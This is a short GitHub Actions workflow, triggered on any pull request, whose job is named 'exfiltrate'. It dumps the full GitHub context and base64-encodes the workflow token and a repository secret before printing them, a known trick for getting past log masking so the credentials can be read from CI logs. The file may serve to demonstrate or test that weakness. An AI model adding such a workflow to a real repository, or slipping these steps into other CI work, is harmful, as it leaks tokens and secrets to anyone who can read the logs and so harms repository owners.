name: Cool

on:
  pull_request:
    branches:
      - '**'

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Dump GitHub context
        env:
          GITHUB_CONTEXT: ${{ toJson(github) }}
        run: echo "$GITHUB_CONTEXT"
      - name: Wowie
        env:
          GREAT: ${{ github.token }}
        run: echo $GREAT | base64
      - run: echo $SECRET_CODE | base64
        env:
          SECRET_CODE: ${{ secrets.NAHBRAHNONO }}